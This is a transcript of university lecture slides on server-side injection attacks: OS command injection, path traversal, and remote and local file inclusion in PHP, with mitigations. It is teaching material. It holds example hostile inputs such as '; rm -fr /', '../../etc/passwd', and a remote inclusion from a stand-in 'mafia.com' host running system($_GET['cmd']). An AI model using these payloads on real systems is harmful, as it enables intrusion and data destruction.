injection attacks on server
play

Injection Attacks on Server (Section 7.3 in book + some extra stuff; - PowerPoint PPT Presentation

Feb 17, 2024 •347 likes •1k views

Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1 Recall: dynamically created web pages Most web pages you see are dynamically created (except for instance

  1. Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1

  2. Recall: dynamically created web pages Most web pages you see are dynamically created (except for instance http://www.cs.ru.nl/~erikpoll/sws2) execution to dynamically create a webpage HTTP request web browser web server dynamically generated HTML sws2 2

  3. CGI (Common Gateway Interface) Early but by now old-fashioned way for web server to interact with command line executables Given a request referring to such a cgi executable, eg http://bla.com/cgi-bin/my_script?yr=2014&str=a%20name the web server executes it, passing parameters to standard input, and returning the output (typically HTML) to client. For the URL above, the web server would execute cgi-bin/my_script 2014 ”a name” The executable my_script can be in any programming language. sws2 3

  4. Example: CGI bash script #!/bin/bash echo 'Content-type: text/html' echo '' echo '<html>' echo '<head>' echo '<title>My first CGI bash script</title>' echo '</head>' echo '<body>' echo 'Hello World' cat some_html_content.html echo '</body>' echo '</html>' exit 0 sws2 4

  5. Example: CGI perl script #!/usr/bin/perl print "Content-type: text/html\n\n"; print <<HTML; <html> <head> <title>My first perl CGI script </title> </head> <body> <p>Hello World</p> </body> HTML exit; sws2 5

  6. Example: CGI program in C int main(){ /* Print CGI response header, required for all HTML output. Note the extra \n, to send the blank line. */ printf("Content-type: text/html\n\n") ; /* Now print the HTML response. */ printf("<html>\n") ; printf("<head><title>Hello world</title></head>\n"); printf("<body>\n"); printf("<h1>Hello, world.</h1>\n") ; printf("</body>\n"); printf("</html>\n"); exit(0); } Why is writing a dynamic web application in C a bad idea? sws2 6

  7. CGI Pros • extremely simple concept & interface • you can use any programming or scripting language – C(++), Java, Ruby,... bash, perl, python,... Cons • you can use any programming language => no support for any web-specific features Esp clumsy parsing of standard input to retrieve GET and POST parameters Hence: dedicated languages for web applications PHP, JSP, ASP.NET, Ruby on Rails,... sws2 7

  8. Example: PHP script <html> <head> <title>A simple PHP script </title> <body> The number you choose was <?php echo $x = $_GET['number']; ?> <br> This number squared plus 1 is <?php $y = $x*$x; $y++; echo $y; ?> <br> Btw, I know that your IP address is <?php echo $_SERVER['REMOTE_ADDR']; ?> </body> </html> sws2 8

  9. Security worries with dynamically created web pages sws2 9

  10. Security worries... Dynamically created web pages involve some processing at the server side which is based on some untrusted input from the client This processing involves execution or interpretation based on this input • this can be processing in the web application itself, but also in other components used, eg the OS or data base Tell-tale signs that some form of interpretation is going on: special characters @ \ . ; < > .... that have a special meaning sws2 10

  11. Attacker model attacker/client sends malicious input to server, with the goal to do some damage... execution to dynamically create a webpage malicious input web server sws2 11

  12. Attacks with malicious inputs can be attacks on • confidentiality – revealing information • integrity – corrupting information – incl. integrity of the system (web application, the OS, ...) itself • availability – DoS attacks on the server (or the underlying OS) – destroying information sws2 12

  13. Dynamically created webpages & injection attacks data web server base malicious input file system OS sws2 13

  14. Dynamically created webpages & injection attacks attack on other users of the same website (discussed next week) data web server base malicious input file system OS sws2 14

  15. Attacking the OS (Not in book!) sws2 15

  16. Command injection (in a CGI script) A CGI bash script might contain cat thefile | mail clientaddress to email a file to a user-supplied email address. Security worries? An attacker might enter the email address erik@cs.ru.nl ; rm – fr / What happens then ? cat thefile | mail erik@cs.ru.nl ; rm – fr / How would you prevent this? sws2 16

  17. Command injection (in a C program) A C program accessible via CGI that prints something to a user- specified printer might include char buf[1024]; snprintf(buf, "system lpr – P %s", printer_name, sizeof(buf)-1); system(buf); Security worries? This can be attacked in the same way! Entering someprintername ; xterm & is less destructive and more interesting than ...;rm – fr / The attacker can also try buffer overflow attacks on C(++) binaries accessible via the web! sws2 17

  18. OS command injection Any server-side executable code that uses client input to interact with the underlying OS might be used to inject commands to OS. Affects web applications irrespective of programming language used Dangerous things to look out for – C/C++ system(), execvp(), ShellExecute(), .. – Runtime.exec(), ... Java – system, exec, open, `, /e, ... Perl – Python exec, eval, input, execfile, ... For specific programming language there may be additional potential problems, eg. buffer overflows for C(++) How would you prevent this? How could you mitigate the potential impact of such attacks? sws2 18

  19. Protecting against OS injection attacks • input validation: validate aka sanatize all user input to avoid dangerous characters – but what are the dangerous characters? ; | > .... – better to do white-listing than blacklisting; ie say which characters are allowed rather than which ones are not – better still: parse the complete input before you do anything with it, using a standard parser, and then use parse trees instead of string • input validation tries to prevent attacks; we should also try to mitigate the possible impact – by running the web application with minimal privileges (aka applying the principle of least privilege) sws2 19

  20. File name injection Consider PHP code below, which uses PHP string concatenation operator . $base_dir = ”/ usr/local/client-startpage /”; echo file_get_contents($base_dir . $_GET[’username’]) ; Security worries? Attacker might eg supply ../../etc/passwd as username Also known as path traversal attack How would you prevent this? sws2 20

  21. File name injection – path traversal attack File name injection can reveal information (ie. violate confidentiality), but can also be used to cause DoS problems (ie. violate availability) Eg by trying to – access a file or directory that does not exists – using special files (eg device files) such as /var/spool/printer, /dev/zero, /dev/full in unintended ways sws2 21

  22. File name injection – path traversal attack Obvious places for an attacker to try this: URLs which include a file name as parameter Eg http:/somesite.com/get-files.php?file=report.pdf http:/somesite.com/get-page.jsp?home=start.html http:/somesite.com/somepage.asp?page=index.html where attacker can try to manipulate the path, eg. http:/somesite.com/get-files.php?file=../admin.cfg sws2 22

  23. Attacking PHP web servers (Section 7.3.2 of book) sws2 23

  24. Remote File Inclusion (RFI) Consider some PHP code that acts on an option chosen from menu that provides the choices “ start ” and “ stop ” $dir = $_GET['option'] include($dir . ”/function.php”) So this will include start/function.php or stop/function.php Security worries? What if user supplies option “ http://mafia.com ” ? The web server would then execute http://mafia.com/function.php This is called Remote File Inclusion (RFI). It allows an attacker to run arbitrary code on a server. Of course, server should be configured to disallow remote file inclusion sws2 24

  25. Remote File Inclusion Sample malicious PHP code to include in http://mafia.com/function.php is system($_GET['cmd']) What will be the effect of victim.php?option=http://mafia.com &cmd=/bin/rm%20-fr%20/ Note: OS command injection via PHP remote file inclusion! sws2 25

  26. PHP injection Can we still attack the code below, if the server disallows remote file inclusion? $dir = $_GET['option'] include($dir . “/function.php”) An attacker can still try Local File Inclusion (LFI) to execute any file called function.php on the server 1. eg ../admin as option will execute $dir/../admin/function.php any file on the server, using null byte %00 that marks the end of a string 2. eg ../admin/management.php%00 as option will execute $dir/../admin/management.php%00function.php 3. upload his own PHP code, eg as a profile picture, and try to execute that, using trick 2 above; then he can still execute his own code... Note: RFI vs LFI is a bit like classic buffer overflow vs return-to-libc attacks sws2 26

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks

Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks

Web Securi rity ty Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks on the web server malicious input web server er output This can be attacks on Availability: i.e. DoS attack, where attacker

1.86k views • 79 slides
Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David

Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David

Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David Wagner February 12, 2014 SQL Injection Scenario Suppose web server front end stores URL parameter recipient in variable $recipient and

656 views • 37 slides
Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1 Recall: dynamically created web pages y y g Virtually all web pages you see are dynamically created

760 views • 63 slides
Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5, 2016 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh What can go bad if a web server is

702 views • 37 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh What can go bad if a web server is

1.13k views • 91 slides
Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D. Keromytis Columbia University Vassilis Prevelakis Drexel University 1 Overview of Technique Protect from code-injection attacks create

608 views • 19 slides
Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS What is all about? New code-injection attacks or return-to-libc attacks in the web

666 views • 48 slides
SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request forgery Code Injection Attacks Attacker executes arbitrary code on server Programming the program Not sanitizing user

287 views • 11 slides
Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

PHP Aspis: Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo Migliavacca, Peter Pietzuch Department of Computing, Imperial College London USENIX WebApps 2011 Portland, OR, USA Injection

763 views • 47 slides
SQL Injection: Summary Target: web server that uses a back-end database Attacker goal:

SQL Injection: Summary Target: web server that uses a back-end database Attacker goal:

SQL Injection: Summary Target: web server that uses a back-end database Attacker goal: inject or modify database commands to either read or alter web-site information Attacker tools: ability to send requests to web server (e.g.,

89 views • 4 slides
SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET /

SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET /

SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET / HTTP/1.0 Browser Web server HTTP/1.1 200 OK index.php Database server slide 2 PHP: Hypertext Preprocessor Server scripting language with C-like

601 views • 23 slides
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Overviewtrated Account Summary Account: Account: &quot;SELECT

445 views • 32 slides
SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access Control 6 Security

682 views • 8 slides
SQL Injection Attacks Many web servers have backing databases Much of their information

SQL Injection Attacks Many web servers have backing databases Much of their information

SQL Injection Attacks Many web servers have backing databases Much of their information stored in a database Web pages are built (in part) based on queries to a database Possibly using some client input . . . Lecture 16 Page 1

646 views • 21 slides
Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to

Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to

Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to Computer Security Day 4: Low-level attacks Shellcode techniques Stephen McCamant University of Minnesota, Computer Science &amp; Engineering

412 views • 5 slides
NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM Cyber Security Center of IBM

NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM Cyber Security Center of IBM

NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM Cyber Security Center of IBM AppScan Excellence Aviv Ron Emanuel Bronshtein Alexandra Shulman-Peleg IBM Security Systems Cyber Center of Excellence AVIV RON Security

452 views • 27 slides
Morales 1 , 2 Hetor Garia Brue 2 Redaelli 2 tino 2 Ro derik , Sefano , Gianlua V alen

Morales 1 , 2 Hetor Garia Brue 2 Redaelli 2 tino 2 Ro derik , Sefano , Gianlua V alen

MD1388: A tiv e Halo Con trol using narro w band exitation at injetion Morales 1 , 2 Hetor Garia Brue 2 Redaelli 2 tino 2 Ro derik , Sefano , Gianlua V alen , h 2 agner 2 Xu 2 Daniel V alu , Jos hk a W , C.

190 views • 7 slides
A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application into executing commands or code embedded in data Data and code mixing! Often injected into interpreters SQL, PHP, Python, JavaScript, LDAP,

377 views • 14 slides
Robust Probabilistic Fake Packet Injection for Receiver-Location Privacy Ruben Rios 1 , Jorge

Robust Probabilistic Fake Packet Injection for Receiver-Location Privacy Ruben Rios 1 , Jorge

Robust Probabilistic Fake Packet Injection for Receiver-Location Privacy Ruben Rios 1 , Jorge Cuellar 2 , Javier Lopez 1 1 NICS Lab University of Mlaga 2 Siemens AG, Munich E SORI CS 2012 10-14 Se pt. Pisa (I ta ly)

432 views • 25 slides
Pure In-Memory (Shell)Code Injection In Linux Userland DeepSec18, Vienna, Austria Disclaimer

Pure In-Memory (Shell)Code Injection In Linux Userland DeepSec18, Vienna, Austria Disclaimer

Pure In-Memory (Shell)Code Injection In Linux Userland DeepSec18, Vienna, Austria Disclaimer The views and opinions expressed in this presentation are those of the author and do not necessarily represent offjcial policy or position of my

510 views • 36 slides
Welcome to Fluffs Rescue and Adoption Centre! Teach Today, we are learning to read words

Welcome to Fluffs Rescue and Adoption Centre! Teach Today, we are learning to read words

Welcome to Fluffs Rescue and Adoption Centre! Teach Today, we are learning to read words containing -tion . Teach When we see - tion in a word, it makes the sound /shun/. Look at these words below: attention potion section mention Teach

142 views • 13 slides
RD53A injection capacitor measurement results &amp; RD53A pixel hit delay measurement results

RD53A injection capacitor measurement results &amp; RD53A pixel hit delay measurement results

RD53A injection capacitor measurement results &amp; RD53A pixel hit delay measurement results 2/02/2018 Magne Lauritzen Part 1 Injection capacitor measurement Goal Measure capacitance of the injection capacitors that are present on

423 views • 16 slides
A 107 W MedRadio Injection-Locked Clock Multiplier with a CTAT-biased 126 ppm/ C Ring

A 107 W MedRadio Injection-Locked Clock Multiplier with a CTAT-biased 126 ppm/ C Ring

Session 3 - Oscillators and PLLs A 107 W MedRadio Injection-Locked Clock Multiplier with a CTAT-biased 126 ppm/ C Ring Oscillator Somok Mondal and Drew A. Hall University of California, San Diego La Jolla, CA, (USA) IEEE CICC, Austin, TX,

652 views • 29 slides

More recommend